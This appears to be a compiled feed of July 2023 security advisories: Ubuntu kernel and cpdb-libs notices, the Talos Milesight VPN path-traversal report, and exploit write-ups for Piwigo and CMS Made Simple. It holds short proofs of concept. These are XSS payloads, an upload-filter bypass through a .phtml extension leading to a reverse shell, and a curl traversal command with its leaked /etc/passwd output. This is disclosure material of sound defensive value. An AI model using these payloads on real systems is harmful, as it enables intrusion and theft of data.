Ubuntu Security Notice 6206-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the NTFS file system implementation in the Linux kernel contained a null pointer dereference in some situations. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6206-1  
July 06, 2023

linux-oem-5.17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-5.17: Linux kernel for OEM systems

Details:

Hangyu Hua discovered that the Flower classifier implementation in the  
Linux kernel contained an out-of-bounds write vulnerability. An attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-35788, LP: #2023577)

It was discovered that the NTFS file system implementation in the Linux  
kernel contained a null pointer dereference in some situations. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-4842)

Seth Jenkins discovered that the CPU data to memory implementation for x86  
processors in the Linux kernel did not properly perform address  
randomization. A local attacker could use this to expose sensitive  
information (kernel memory) or in conjunction with another kernel  
vulnerability. (CVE-2023-0597)

It was discovered that the XFS file system implementation in the Linux  
kernel did not properly perform metadata validation when mounting certain  
images. An attacker could use this to specially craft a file system image  
that, when mounted, could cause a denial of service (system crash).  
(CVE-2023-2124)

It was discovered that for some Intel processors the INVLPG instruction  
implementation did not properly flush global TLB entries when PCIDs are  
enabled. An attacker could use this to expose sensitive information  
(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.17.0-1034-oem     5.17.0-1034.35  
   linux-image-oem-22.04           5.17.0.1034.32  
   linux-image-oem-22.04a          5.17.0.1034.32

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6206-1  
   https://launchpad.net/bugs/2023220  
   https://launchpad.net/bugs/2023577  
   CVE-2022-4842, CVE-2023-0597, CVE-2023-2124, CVE-2023-35788

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1034.35

Ubuntu Security Notice USN-6206-1

Ubuntu Security Notice 6207-1 - It was discovered that the TUN/TAP driver in the Linux kernel did not properly initialize socket data. A local attacker could use this to cause a denial of service. It was discovered that the Real-Time Scheduling Class implementation in the Linux kernel contained a type confusion vulnerability in some situations. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6207-1  
July 06, 2023

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms

Details:

It was discovered that the TUN/TAP driver in the Linux kernel did not  
properly initialize socket data. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1076)

It was discovered that the Real-Time Scheduling Class implementation in the  
Linux kernel contained a type confusion vulnerability in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-1077)

It was discovered that the ASUS HID driver in the Linux kernel did not  
properly handle device removal, leading to a use-after-free vulnerability.  
A local attacker with physical access could plug in a specially crafted USB  
device to cause a denial of service (system crash). (CVE-2023-1079)

It was discovered that the Xircom PCMCIA network device driver in the Linux  
kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2023-1670)

It was discovered that a race condition existed in the Xen transport layer  
implementation for the 9P file system protocol in the Linux kernel, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (guest crash) or expose sensitive information (guest  
kernel memory). (CVE-2023-1859)

Jose Oliveira and Rodrigo Branco discovered that the Spectre Variant 2  
mitigations with prctl syscall were insufficient in some situations. A  
local attacker could possibly use this to expose sensitive information.  
(CVE-2023-1998)

It was discovered that the BigBen Interactive Kids' gamepad driver in the  
Linux kernel did not properly handle device removal, leading to a use-  
after-free vulnerability. A local attacker with physical access could plug  
in a specially crafted USB device to cause a denial of service (system  
crash). (CVE-2023-25012)

It was discovered that a use-after-free vulnerability existed in the HFS+  
file system implementation in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-2985)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1033-intel-iotg  5.15.0-1033.38  
   linux-image-intel-iotg          5.15.0.1033.32

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1033-intel-iotg  5.15.0-1033.38~20.04.1  
   linux-image-intel               5.15.0.1033.38~20.04.24  
   linux-image-intel-iotg          5.15.0.1033.38~20.04.24

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6207-1  
   CVE-2023-1076, CVE-2023-1077, CVE-2023-1079, CVE-2023-1670,  
   CVE-2023-1859, CVE-2023-1998, CVE-2023-25012, CVE-2023-2985

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1033.38

 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1033.38~20.04.1

Ubuntu Security Notice USN-6207-1

Ubuntu Security Notice 6205-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that for some Intel processors the INVLPG instruction implementation did not properly flush global TLB entries when PCIDs are enabled. An attacker could use this to expose sensitive information or possibly cause undesired behaviors.

    ==========================================================================Ubuntu Security Notice USN-6205-1July 06, 2023linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-35788, LP: #2023577)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1103-gke      5.4.0-1103.110   linux-image-gke                 5.4.0.1103.108   linux-image-gke-5.4             5.4.0.1103.108After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6205-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1103.110

Ubuntu Security Notice USN-6205-1

Piwigo version 13.7.0 suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)#Date: 25 June 2023#Exploit Author: Okan Kurtulus#Vendor Homepage: https://piwigo.org#Version: 13.7.0#Tested on: Ubuntu 22.04#CVE : N/A# Proof of Concept:1– Install the system through the website and log in with any user authorized to upload photos.2–  Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.#Payload<sCriPt>alert(1);</sCriPt>

Piwigo 13.7.0 Cross Site Scripting

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight VPN v2.0.2

**PRODUCT URLS**

MilesightVPN - https://www.milesight-iot.com/milesightvpn/

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The MilesightVPN is software that make the process easier of setting up the VPN tunnel for Milesight products, as well as allows monitoring the connection status with a web server interface.

The MilesightVPN’s server.js file has the start function that is the one responsible to manage the received requests:

    function start(route,handle,connection,generateToken,verifyToken,lang){
        const options={
            key:fs.readFileSync(path.join(__dirname,'./https/server.key')),
            cert:fs.readFileSync(path.join(__dirname,'./https/server.crt'))
        };
        var defaultpage={
            page:'index.html',
            login:'login.html',
            port:'18080',
            ssl_port:'18443'
        };
        disconnect(connection);
       [...]
        https.createServer(options,function(req,res){
            var method=req.method;
            var pathname=url.parse(req.url).pathname;
            [...]
            var ext=path.parse(pathname).ext;
            ext=ext.slice(1);
            [...]
            var realPath=path.join(__dirname,'../'+pathname);
            var cookie=req.headers.cookie;
            if(cookie)
            {
                [...]
            }
            else
            {
                if(ext=='html'&&(pathname.indexOf('login.html')<0&&pathname.indexOf('Device_Auth')<0))
                {
                    [...]
                }
            }
    
            if(method=='POST')
            {
                [...]
            }
            else
            {
                [...]
                if(ext=='html')
                {
                    [...]
                }
                fs.readFile(realPath,function(err,data){                                                    [1]
                    [...]
                    var contentType='';
                    switch(ext){
                        case 'html':
                            contentType='text/html';
                            break;
                        [...]
                        default:
                            contentType='text/plain';
                    }
                    res.writeHead(200,{'Content-Type':contentType});
                    res.end(data);
                });
            }
    
    
        }).listen(defaultpage.ssl_port);
    }
    

The function perform a series of check in the case the requested page extensions is html and in the case a cookie is provided. But, if the file does not have such extension and no cookie is provided, eventually, the code at [1] is reached and because no checks is performed against the provided path, this function is vulnerable to an unauthenticated directory path traversal.

**Exploit Proof of Concept**

Following a POC for the vulnerability exposed above:

    $ curl --path-as-is --insecure https://<SERVER_ADDRESS>/../etc/passwd  
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
    landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:111:1::/var/cache/pollinate:/bin/false
    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    vboxadd:x:997:1::/var/run/vboxadd:/bin/false
    fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
    redis:x:1002:1002::/home/redis:/bin/false
    stund:x:1003:1003::/home/stund:/bin/false
    tunnel:x:1004:1004::/bin:/bin/false
    

The request’s response is the /etc/passwd content.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-23907: TALOS-2023-1702 || Cisco Talos Intelligence Group

CMS Made Simple v2.2.17 is vulnerable to Remote Command Execution via the File Upload Function.

**#Exploit Title:** CMS Made Simple v2.2.17 – File Upload Remote Code Execution (Authenticated)

**#Date:** 25 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://www.cmsmadesimple.org/

**#Version:** 2.2.17

**#Tested on:** Ubuntu 18.0.4

**#CVE:** 2023-36969

**#Proof of Concept:**

**1-)** Install the system through the website and log in with any user.

**2-)** After logging in, click “File Manager” under “Content” from the left menu.

**3-)** Some file extensions are blocked from uploading. PHP extension is among them. To bypass this, we change the extension to PHTML.

**4-)** When we call the shell file, the reverse shell is taken.

When we make a small query, we see that 11950 websites use the relevant application.

CVE-2023-36969: CMS Made Simple v2.2.17 – File Upload Remote Code Execution (RCE) (Authenticated)

A Cross-site scripting (XSS) vulnerability in CMS Made Simple v2.2.17 allows remote attackers to inject arbitrary web script or HTML via the File Upload function.

**#Exploit Title:** CMS Made Simple v2.2.17 – Stored Cross-Site Scripting (XSS) (Authenticated)

**#Date:** 25 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://www.cmsmadesimple.org

**#Version:** 2.2.17

**#Tested on:** Ubuntu 18.04

**#CVE:** 2023-36970

**#Proof of Concept:**

**1-)** Install the system through the website and login with any user. (It is also possible to login with low authorized users.)

**2-)** After logging in, click “File Manager” under “Content” from the left menu.

**3-)** At first, I wanted to upload by adding the XSS payload to the file name, but I encountered an error. My guess is there is a control mechanism.

**4-)** Then I caught the normal file upload request with HTTP proxy. In the relevant request, I sent a payload to the filename parameter as follows.

1.txt<img src=x onerror=alert(1)>

**5-**) We see that Stored XSS is triggered when we click on the “File Manager” button under “Content” in the left menu.

CVE-2023-36970: CMS Made Simple v2.2.17 – Stored Cross-Site Scripting (XSS) (Authenticated)

An issue was discovered in pdfcrack 0.17 thru 0.18, allows attackers to execute arbitrary code via a stack overflow in the MD5 function.

*   Summary
*   Files
*   Reviews
*   Support
*   Tickets ▾
    *   Bugs
    *   Support Requests
    *   Patches
    *   Feature Requests
*   News
*   Discussion

Menu ▾ ▴

**#12 stack-buffer-overflow**

Status: closed

Priority: 9

Updated: 2020-04-24

Created: 2020-02-29

Private: No

hi, i find a stack over-flow when to calculate md5 value.  
crashed datas can find in https://github.com/p1ay8y3ar/crashdatas/tree/master/padcrack/29022020  
here is ASAN says

freedom@ubuntu:~/Downloads/pdfcrack\-0.18$ ./pdfcrack \-l /home/freedom/Desktop/pdfcrack/pdfcrack\-0.17/o/crashes/id\\:000000\\,sig\\:06\\,src\\:000072\\,op\\:ext\_AO\\,pos\\:28
\=================================================================
\==5441\==ERROR: AddressSanitizer: stack\-buffer\-overflow on address 0x7ffe99b24673 at pc 0x55929a48d42c bp 0x7ffe99b24430 sp 0x7ffe99b24420
READ of size 1 at 0x7ffe99b24673 thread T0
    #0 0x55929a48d42b in md5 /home/freedom/Downloads/pdfcrack\-0.18/md5.c:79
    #1 0x55929a48da1c in md5\_50s /home/freedom/Downloads/pdfcrack\-0.18/md5.c:202
    #2 0x55929a48e445 in isUserPasswordRev3 /home/freedom/Downloads/pdfcrack\-0.18/pdfcrack.c:261
    #3 0x55929a494d3a in initPDFCrack /home/freedom/Downloads/pdfcrack\-0.18/pdfcrack.c:678
    #4 0x55929a477b4d in main /home/freedom/Downloads/pdfcrack\-0.18/main.c:304
    #5 0x7f5726b4d1e2 in \_\_libc\_start\_main (/lib/x86\_64\-linux\-gnu/libc.so.6+0x271e2)
    #6 0x55929a47909d in \_start (/home/freedom/Downloads/pdfcrack\-0.18/pdfcrack+0x809d)

Address 0x7ffe99b24673 is located in stack of thread T0 at offset 83 in frame
    #0 0x55929a48e26f in isUserPasswordRev3 /home/freedom/Downloads/pdfcrack\-0.18/pdfcrack.c:253

  This frame has 3 object(s):
    \[32, 48) 'test' (line 254)
    \[64, 80) 'enckey' (line 254) <== Memory access at offset 83 overflows this variable
    \[96, 112) 'tmpkey' (line 254)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack\-buffer\-overflow /home/freedom/Downloads/pdfcrack\-0.18/md5.c:79 in md5
Shadow bytes around the buggy address:
  0x10005335c870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
  0x10005335c8a0: f1 f1 00 00 00 00 00 00 00 00 f3 f3 f3 f3 00 00
  0x10005335c8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x10005335c8c0: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00\[f2\]f2
  0x10005335c8d0: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
  0x10005335c8f0: f1 f1 00 00 f2 f2 00 00 f3 f3 00 00 00 00 00 00
  0x10005335c900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c910: 00 00 00 00 00 00 f1 f1 f1 f1 01 f2 f8 f2 00 f2
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==5441\==ABORTING

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2020-22336: pdfcrack / Bugs

Ubuntu Security Notice 6204-1 - Seth Arnold discovered that CPDB incorrectly handled certain characters. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6204-1  
July 05, 2023

cpdb-libs vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CPDB could be made to crash or execute arbitrary code.

Software Description:  
- cpdb-libs: Common Print Dialog Backends - Tools

Details:

Seth Arnold discovered that CPDB incorrectly handled certain characters.  
An attacker could possibly use this issue to cause a crash or execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  cpdb-libs-tools                 2.0~b4-0ubuntu2.1  
  libcpdb-frontend2               2.0~b4-0ubuntu2.1  
  libcpdb-libs-tools              2.0~b4-0ubuntu2.1  
  libcpdb2                        2.0~b4-0ubuntu2.1

Ubuntu 22.10:  
  libcpdb-libs-common1            1.2.0-0ubuntu8.1.22.10.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu8.1.22.10.1

Ubuntu 22.04 LTS:  
  libcpdb-libs-common1            1.2.0-0ubuntu8.1.22.04.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu8.1.22.04.1

Ubuntu 20.04 LTS:  
  libcpdb-libs-common1            1.2.0-0ubuntu7.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu7.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6204-1  
  CVE-2023-34095

Package Information:  
  https://launchpad.net/ubuntu/+source/cpdb-libs/2.0~b4-0ubuntu2.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu8.1.22.10.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu8.1.22.04.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu7.1

Tag

#ubuntu